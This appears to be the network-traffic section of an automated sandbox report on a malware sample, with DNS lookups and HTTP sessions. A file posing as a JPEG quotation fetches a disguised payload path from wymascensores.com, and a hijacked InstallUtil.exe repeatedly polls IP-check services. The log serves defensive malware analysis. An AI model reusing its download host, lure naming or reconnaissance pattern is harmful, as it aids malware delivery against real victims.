                        Sep 26, 2024 09:57:58.250614882 CEST | 192.168.2.5 | 1.1.1.1 | 0xb207 | Standard query (0) | wymascensores.com | A (IP address) | IN (0x0001) | false
                        Sep 26, 2024 09:58:01.792212009 CEST | 192.168.2.5 | 1.1.1.1 | 0xde13 | Standard query (0) | checkip.dyndns.org | A (IP address) | IN (0x0001) | false
                        Sep 26, 2024 09:58:03.014956951 CEST | 192.168.2.5 | 1.1.1.1 | 0x8260 | Standard query (0) | reallyfreegeoip.org | A (IP address) | IN (0x0001) | false
                        Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                        Sep 26, 2024 09:57:58.490430117 CEST | 1.1.1.1 | 192.168.2.5 | 0xb207 | No error (0) | wymascensores.com | | 67.212.175.162 | A (IP address) | IN (0x0001) | false
                        Sep 26, 2024 09:58:01.799412966 CEST | 1.1.1.1 | 192.168.2.5 | 0xde13 | No error (0) | checkip.dyndns.org | checkip.dyndns.com | | CNAME (Canonical name) | IN (0x0001) | false
                        Sep 26, 2024 09:58:01.799412966 CEST | 1.1.1.1 | 192.168.2.5 | 0xde13 | No error (0) | checkip.dyndns.com | | 158.101.44.242 | A (IP address) | IN (0x0001) | false
                        Sep 26, 2024 09:58:01.799412966 CEST | 1.1.1.1 | 192.168.2.5 | 0xde13 | No error (0) | checkip.dyndns.com | | 132.226.247.73 | A (IP address) | IN (0x0001) | false
                        Sep 26, 2024 09:58:01.799412966 CEST | 1.1.1.1 | 192.168.2.5 | 0xde13 | No error (0) | checkip.dyndns.com | | 193.122.130.0 | A (IP address) | IN (0x0001) | false
                        Sep 26, 2024 09:58:01.799412966 CEST | 1.1.1.1 | 192.168.2.5 | 0xde13 | No error (0) | checkip.dyndns.com | | 132.226.8.169 | A (IP address) | IN (0x0001) | false
                        Sep 26, 2024 09:58:01.799412966 CEST | 1.1.1.1 | 192.168.2.5 | 0xde13 | No error (0) | checkip.dyndns.com | | 193.122.6.168 | A (IP address) | IN (0x0001) | false
                        Sep 26, 2024 09:58:03.022213936 CEST | 1.1.1.1 | 192.168.2.5 | 0x8260 | No error (0) | reallyfreegeoip.org | | 188.114.96.3 | A (IP address) | IN (0x0001) | false
                        Sep 26, 2024 09:58:03.022213936 CEST | 1.1.1.1 | 192.168.2.5 | 0x8260 | No error (0) | reallyfreegeoip.org | | 188.114.97.3 | A (IP address) | IN (0x0001) | false
                        • wymascensores.com
                        • reallyfreegeoip.org
                        • checkip.dyndns.org
                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        0 | 192.168.2.5 | 49705 | 158.101.44.242 | 80 | 5500 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                        Timestamp | Bytes transferred | Direction | Data
                        Sep 26, 2024 09:58:01.812444925 CEST | 151 | OUT | GET / HTTP/1.1
                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                        Host: checkip.dyndns.org
                        Connection: Keep-Alive
                        Sep 26, 2024 09:58:02.655642986 CEST | 320 | IN | HTTP/1.1 200 OK
                        Date: Thu, 26 Sep 2024 07:58:02 GMT
                        Content-Type: text/html
                        Content-Length: 103
                        Connection: keep-alive
                        Cache-Control: no-cache
                        Pragma: no-cache
                        X-Request-ID: 39bdfde6e7a2dc714fffd4ed7b7eb7b1
                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                        Sep 26, 2024 09:58:02.692636013 CEST | 127 | OUT | GET / HTTP/1.1
                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                        Host: checkip.dyndns.org
                        Sep 26, 2024 09:58:02.870244980 CEST | 320 | IN | HTTP/1.1 200 OK
                        Date: Thu, 26 Sep 2024 07:58:02 GMT
                        Content-Type: text/html
                        Content-Length: 103
                        Connection: keep-alive
                        Cache-Control: no-cache
                        Pragma: no-cache
                        X-Request-ID: e39303457c3435230307704359d429d9
                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                        Sep 26, 2024 09:58:03.704962969 CEST | 127 | OUT | GET / HTTP/1.1
                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                        Host: checkip.dyndns.org
                        Sep 26, 2024 09:58:03.895771980 CEST | 320 | IN | HTTP/1.1 200 OK
                        Date: Thu, 26 Sep 2024 07:58:03 GMT
                        Content-Type: text/html
                        Content-Length: 103
                        Connection: keep-alive
                        Cache-Control: no-cache
                        Pragma: no-cache
                        X-Request-ID: a19912bb6b1fd66d8a37d13769df3cf2
                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        1 | 192.168.2.5 | 49708 | 158.101.44.242 | 80 | 5500 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                        Timestamp | Bytes transferred | Direction | Data
                        Sep 26, 2024 09:58:04.512077093 CEST | 127 | OUT | GET / HTTP/1.1
                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                        Host: checkip.dyndns.org
                        Sep 26, 2024 09:58:06.908375025 CEST | 320 | IN | HTTP/1.1 200 OK
                        Date: Thu, 26 Sep 2024 07:58:06 GMT
                        Content-Type: text/html
                        Content-Length: 103
                        Connection: keep-alive
                        Cache-Control: no-cache
                        Pragma: no-cache
                        X-Request-ID: 9667b3a12271bf0f69fa6ae62ed4ebdf
                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        2 | 192.168.2.5 | 49710 | 158.101.44.242 | 80 | 5500 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                        Timestamp | Bytes transferred | Direction | Data
                        Sep 26, 2024 09:58:07.558267117 CEST | 151 | OUT | GET / HTTP/1.1
                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                        Host: checkip.dyndns.org
                        Connection: Keep-Alive
                        Sep 26, 2024 09:58:11.386081934 CEST | 320 | IN | HTTP/1.1 200 OK
                        Date: Thu, 26 Sep 2024 07:58:11 GMT
                        Content-Type: text/html
                        Content-Length: 103
                        Connection: keep-alive
                        Cache-Control: no-cache
                        Pragma: no-cache
                        X-Request-ID: bfdf0eed64a153e0986012b0a5a45f25
                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        3 | 192.168.2.5 | 49713 | 158.101.44.242 | 80 | 5500 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                        Timestamp | Bytes transferred | Direction | Data
                        Sep 26, 2024 09:58:11.986128092 CEST | 151 | OUT | GET / HTTP/1.1
                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                        Host: checkip.dyndns.org
                        Connection: Keep-Alive
                        Sep 26, 2024 09:58:12.744321108 CEST | 320 | IN | HTTP/1.1 200 OK
                        Date: Thu, 26 Sep 2024 07:58:12 GMT
                        Content-Type: text/html
                        Content-Length: 103
                        Connection: keep-alive
                        Cache-Control: no-cache
                        Pragma: no-cache
                        X-Request-ID: 44626f9d7035c1dd63e5659275210f88
                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        4 | 192.168.2.5 | 49715 | 158.101.44.242 | 80 | 5500 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                        Timestamp | Bytes transferred | Direction | Data
                        Sep 26, 2024 09:58:13.495141983 CEST | 151 | OUT | GET / HTTP/1.1
                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                        Host: checkip.dyndns.org
                        Connection: Keep-Alive
                        Sep 26, 2024 09:58:15.432420015 CEST | 320 | IN | HTTP/1.1 200 OK
                        Date: Thu, 26 Sep 2024 07:58:15 GMT
                        Content-Type: text/html
                        Content-Length: 103
                        Connection: keep-alive
                        Cache-Control: no-cache
                        Pragma: no-cache
                        X-Request-ID: 165a315d36c153ce8f8ef54c216a0c28
                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        5 | 192.168.2.5 | 49719 | 158.101.44.242 | 80 | 3176 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                        Timestamp | Bytes transferred | Direction | Data
                        Sep 26, 2024 09:58:15.178100109 CEST | 151 | OUT | GET / HTTP/1.1
                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                        Host: checkip.dyndns.org
                        Connection: Keep-Alive
                        Sep 26, 2024 09:58:16.910166025 CEST | 320 | IN | HTTP/1.1 200 OK
                        Date: Thu, 26 Sep 2024 07:58:16 GMT
                        Content-Type: text/html
                        Content-Length: 103
                        Connection: keep-alive
                        Cache-Control: no-cache
                        Pragma: no-cache
                        X-Request-ID: 39401da3c3c75e0cb9602538bc0f4db0
                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                        Sep 26, 2024 09:58:16.914083958 CEST | 127 | OUT | GET / HTTP/1.1
                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                        Host: checkip.dyndns.org
                        Sep 26, 2024 09:58:17.216331959 CEST | 320 | IN | HTTP/1.1 200 OK
                        Date: Thu, 26 Sep 2024 07:58:17 GMT
                        Content-Type: text/html
                        Content-Length: 103
                        Connection: keep-alive
                        Cache-Control: no-cache
                        Pragma: no-cache
                        X-Request-ID: 1906789b59e6d6f3768d2c3a7c6e881c
                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                        Sep 26, 2024 09:58:17.879894972 CEST | 127 | OUT | GET / HTTP/1.1
                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                        Host: checkip.dyndns.org
                        Sep 26, 2024 09:58:18.033339977 CEST | 320 | IN | HTTP/1.1 200 OK
                        Date: Thu, 26 Sep 2024 07:58:17 GMT
                        Content-Type: text/html
                        Content-Length: 103
                        Connection: keep-alive
                        Cache-Control: no-cache
                        Pragma: no-cache
                        X-Request-ID: 33ff2b72b61387faa9bd5905ab3a6fba
                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        6 | 192.168.2.5 | 49724 | 158.101.44.242 | 80 | 5500 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                        Timestamp | Bytes transferred | Direction | Data
                        Sep 26, 2024 09:58:16.123888016 CEST | 151 | OUT | GET / HTTP/1.1
                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                        Host: checkip.dyndns.org
                        Connection: Keep-Alive
                        Sep 26, 2024 09:58:19.067699909 CEST | 320 | IN | HTTP/1.1 200 OK
                        Date: Thu, 26 Sep 2024 07:58:18 GMT
                        Content-Type: text/html
                        Content-Length: 103
                        Connection: keep-alive
                        Cache-Control: no-cache
                        Pragma: no-cache
                        X-Request-ID: ebc756fdd90a8047d174a89ad89d34ad
                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        7 | 192.168.2.5 | 49729 | 158.101.44.242 | 80 | 3176 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                        Timestamp | Bytes transferred | Direction | Data
                        Sep 26, 2024 09:58:18.754442930 CEST | 127 | OUT | GET / HTTP/1.1
                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                        Host: checkip.dyndns.org
                        Sep 26, 2024 09:58:19.340846062 CEST | 320 | IN | HTTP/1.1 200 OK
                        Date: Thu, 26 Sep 2024 07:58:19 GMT
                        Content-Type: text/html
                        Content-Length: 103
                        Connection: keep-alive
                        Cache-Control: no-cache
                        Pragma: no-cache
                        X-Request-ID: 5f37fc886b406ac17930d056169a0c9a
                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        8 | 192.168.2.5 | 49733 | 158.101.44.242 | 80 | 5500 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                        Timestamp | Bytes transferred | Direction | Data
                        Sep 26, 2024 09:58:19.672642946 CEST | 151 | OUT | GET / HTTP/1.1
                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                        Host: checkip.dyndns.org
                        Connection: Keep-Alive
                        Sep 26, 2024 09:58:20.511933088 CEST | 320 | IN | HTTP/1.1 200 OK
                        Date: Thu, 26 Sep 2024 07:58:20 GMT
                        Content-Type: text/html
                        Content-Length: 103
                        Connection: keep-alive
                        Cache-Control: no-cache
                        Pragma: no-cache
                        X-Request-ID: b53e50554dba06bfc1d6d1e98a1c5b8e
                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        9 | 192.168.2.5 | 49734 | 158.101.44.242 | 80 | 3176 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                        Timestamp | Bytes transferred | Direction | Data
                        Sep 26, 2024 09:58:19.986964941 CEST | 151 | OUT | GET / HTTP/1.1
                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                        Host: checkip.dyndns.org
                        Connection: Keep-Alive
                        Sep 26, 2024 09:58:20.558346033 CEST | 320 | IN | HTTP/1.1 200 OK
                        Date: Thu, 26 Sep 2024 07:58:20 GMT
                        Content-Type: text/html
                        Content-Length: 103
                        Connection: keep-alive
                        Cache-Control: no-cache
                        Pragma: no-cache
                        X-Request-ID: eb68d1e4f7e67b310f37fc8869d64895
                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        10 | 192.168.2.5 | 49737 | 158.101.44.242 | 80 | 3176 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                        Timestamp | Bytes transferred | Direction | Data
                        Sep 26, 2024 09:58:21.351094961 CEST | 151 | OUT | GET / HTTP/1.1
                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                        Host: checkip.dyndns.org
                        Connection: Keep-Alive
                        Sep 26, 2024 09:58:23.454595089 CEST | 320 | IN | HTTP/1.1 200 OK
                        Date: Thu, 26 Sep 2024 07:58:23 GMT
                        Content-Type: text/html
                        Content-Length: 103
                        Connection: keep-alive
                        Cache-Control: no-cache
                        Pragma: no-cache
                        X-Request-ID: 332862dfb5b51b5acdb292bb0e6c7e32
                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        11 | 192.168.2.5 | 49738 | 158.101.44.242 | 80 | 5780 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                        Timestamp | Bytes transferred | Direction | Data
                        Sep 26, 2024 09:58:22.737683058 CEST | 151 | OUT | GET / HTTP/1.1
                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                        Host: checkip.dyndns.org
                        Connection: Keep-Alive
                        Sep 26, 2024 09:58:24.346460104 CEST | 320 | IN | HTTP/1.1 200 OK
                        Date: Thu, 26 Sep 2024 07:58:24 GMT
                        Content-Type: text/html
                        Content-Length: 103
                        Connection: keep-alive
                        Cache-Control: no-cache
                        Pragma: no-cache
                        X-Request-ID: 6ac9f45b786a0ac9a513b18249eab7ae
                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                        Sep 26, 2024 09:58:24.350236893 CEST | 127 | OUT | GET / HTTP/1.1
                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                        Host: checkip.dyndns.org
                        Sep 26, 2024 09:58:24.740381956 CEST | 320 | IN | HTTP/1.1 200 OK
                        Date: Thu, 26 Sep 2024 07:58:24 GMT
                        Content-Type: text/html
                        Content-Length: 103
                        Connection: keep-alive
                        Cache-Control: no-cache
                        Pragma: no-cache
                        X-Request-ID: 05aadb28d120820584bd95bbe2311936
                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                        Sep 26, 2024 09:58:25.488765955 CEST | 127 | OUT | GET / HTTP/1.1
                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                        Host: checkip.dyndns.org
                        Sep 26, 2024 09:58:25.640572071 CEST | 320 | IN | HTTP/1.1 200 OK
                        Date: Thu, 26 Sep 2024 07:58:25 GMT
                        Content-Type: text/html
                        Content-Length: 103
                        Connection: keep-alive
                        Cache-Control: no-cache
                        Pragma: no-cache
                        X-Request-ID: 315f1c894e074f2c9a5041957c4af524
                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        12 | 192.168.2.5 | 49740 | 158.101.44.242 | 80 | 3176 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                        Timestamp | Bytes transferred | Direction | Data
                        Sep 26, 2024 09:58:24.098526955 CEST | 151 | OUT | GET / HTTP/1.1
                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                        Host: checkip.dyndns.org
                        Connection: Keep-Alive
                        Sep 26, 2024 09:58:24.670777082 CEST | 320 | IN | HTTP/1.1 200 OK
                        Date: Thu, 26 Sep 2024 07:58:24 GMT
                        Content-Type: text/html
                        Content-Length: 103
                        Connection: keep-alive
                        Cache-Control: no-cache
                        Pragma: no-cache
                        X-Request-ID: a6a9d2e2d53e4bf17b85e0b816b20a68
                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        13 | 192.168.2.5 | 49743 | 158.101.44.242 | 80 | 3176 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                        Timestamp | Bytes transferred | Direction | Data
                        Sep 26, 2024 09:58:25.325973034 CEST | 151 | OUT | GET / HTTP/1.1
                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                        Host: checkip.dyndns.org
                        Connection: Keep-Alive
                        Sep 26, 2024 09:58:25.918742895 CEST | 320 | IN | HTTP/1.1 200 OK
                        Date: Thu, 26 Sep 2024 07:58:25 GMT
                        Content-Type: text/html
                        Content-Length: 103
                        Connection: keep-alive
                        Cache-Control: no-cache
                        Pragma: no-cache
                        X-Request-ID: d6e2b26d1fe2b68ff33b7a3368482419
                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        14 | 192.168.2.5 | 49746 | 158.101.44.242 | 80 | 5780 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                        Timestamp | Bytes transferred | Direction | Data
                        Sep 26, 2024 09:58:26.581479073 CEST | 127 | OUT | GET / HTTP/1.1
                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                        Host: checkip.dyndns.org
                        Sep 26, 2024 09:58:27.152457952 CEST | 320 | IN | HTTP/1.1 200 OK
                        Date: Thu, 26 Sep 2024 07:58:27 GMT
                        Content-Type: text/html
                        Content-Length: 103
                        Connection: keep-alive
                        Cache-Control: no-cache
                        Pragma: no-cache
                        X-Request-ID: e578b55265b262c57941484dc17f2b2c
                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        15 | 192.168.2.5 | 49747 | 158.101.44.242 | 80 | 3176 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                        Timestamp | Bytes transferred | Direction | Data
                        Sep 26, 2024 09:58:26.582603931 CEST | 151 | OUT | GET / HTTP/1.1
                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                        Host: checkip.dyndns.org
                        Connection: Keep-Alive
                        Sep 26, 2024 09:58:27.170015097 CEST | 320 | IN | HTTP/1.1 200 OK
                        Date: Thu, 26 Sep 2024 07:58:27 GMT
                        Content-Type: text/html
                        Content-Length: 103
                        Connection: keep-alive
                        Cache-Control: no-cache
                        Pragma: no-cache
                        X-Request-ID: d05f89e18b7e92f6052dabac2f86ba48
                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        16 | 192.168.2.5 | 49750 | 158.101.44.242 | 80 | 5780 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                        Timestamp | Bytes transferred | Direction | Data
                        Sep 26, 2024 09:58:27.764898062 CEST | 151 | OUT | GET / HTTP/1.1
                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                        Host: checkip.dyndns.org
                        Connection: Keep-Alive
                        Sep 26, 2024 09:58:29.895591021 CEST | 320 | IN | HTTP/1.1 200 OK
                        Date: Thu, 26 Sep 2024 07:58:29 GMT
                        Content-Type: text/html
                        Content-Length: 103
                        Connection: keep-alive
                        Cache-Control: no-cache
                        Pragma: no-cache
                        X-Request-ID: 77270bd66d70bb41038fe2de52f3519b
                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        17 | 192.168.2.5 | 49752 | 158.101.44.242 | 80 | 5780 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                        Timestamp | Bytes transferred | Direction | Data
                        Sep 26, 2024 09:58:30.536752939 CEST | 151 | OUT | GET / HTTP/1.1
                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                        Host: checkip.dyndns.org
                        Connection: Keep-Alive
                        Sep 26, 2024 09:58:32.669946909 CEST | 320 | IN | HTTP/1.1 200 OK
                        Date: Thu, 26 Sep 2024 07:58:32 GMT
                        Content-Type: text/html
                        Content-Length: 103
                        Connection: keep-alive
                        Cache-Control: no-cache
                        Pragma: no-cache
                        X-Request-ID: 16167df1d4885e06a36bab9ac1834070
                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        18 | 192.168.2.5 | 49754 | 158.101.44.242 | 80 | 5780 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                        Timestamp | Bytes transferred | Direction | Data
                        Sep 26, 2024 09:58:33.262712955 CEST | 151 | OUT | GET / HTTP/1.1
                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                        Host: checkip.dyndns.org
                        Connection: Keep-Alive
                        Sep 26, 2024 09:58:35.562149048 CEST | 320 | IN | HTTP/1.1 200 OK
                        Date: Thu, 26 Sep 2024 07:58:35 GMT
                        Content-Type: text/html
                        Content-Length: 103
                        Connection: keep-alive
                        Cache-Control: no-cache
                        Pragma: no-cache
                        X-Request-ID: ae6a3a458c5c1b4b0653f7006c29dc57
                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        19 | 192.168.2.5 | 49756 | 158.101.44.242 | 80 | 5780 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                        Timestamp | Bytes transferred | Direction | Data
                        Sep 26, 2024 09:58:36.215033054 CEST | 151 | OUT | GET / HTTP/1.1
                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                        Host: checkip.dyndns.org
                        Connection: Keep-Alive
                        Sep 26, 2024 09:58:38.266191006 CEST | 320 | IN | HTTP/1.1 200 OK
                        Date: Thu, 26 Sep 2024 07:58:38 GMT
                        Content-Type: text/html
                        Content-Length: 103
                        Connection: keep-alive
                        Cache-Control: no-cache
                        Pragma: no-cache
                        X-Request-ID: 7e2b03e5508a8bbd398c985de478fc7c
                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        20 | 192.168.2.5 | 49758 | 158.101.44.242 | 80 | 5780 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                        Timestamp | Bytes transferred | Direction | Data
                        Sep 26, 2024 09:58:38.977634907 CEST | 151 | OUT | GET / HTTP/1.1
                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                        Host: checkip.dyndns.org
                        Connection: Keep-Alive
                        Sep 26, 2024 09:58:41.241326094 CEST | 320 | IN | HTTP/1.1 200 OK
                        Date: Thu, 26 Sep 2024 07:58:41 GMT
                        Content-Type: text/html
                        Content-Length: 103
                        Connection: keep-alive
                        Cache-Control: no-cache
                        Pragma: no-cache
                        X-Request-ID: 6bbd602ba3219af4e1b07e667215fdaa
                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        0 | 192.168.2.5 | 49704 | 67.212.175.162 | 443 | 3148 | C:\Users\user\Desktop\RFQ____RM quotation_JPEG IMAGE.img.exe
                        Timestamp | Bytes transferred | Direction | Data
                        2024-09-26 07:57:59 UTC | 86 | OUT | GET /panel/Skdqhzzwa.mp3 HTTP/1.1
                        Host: wymascensores.com
                        Connection: Keep-Alive
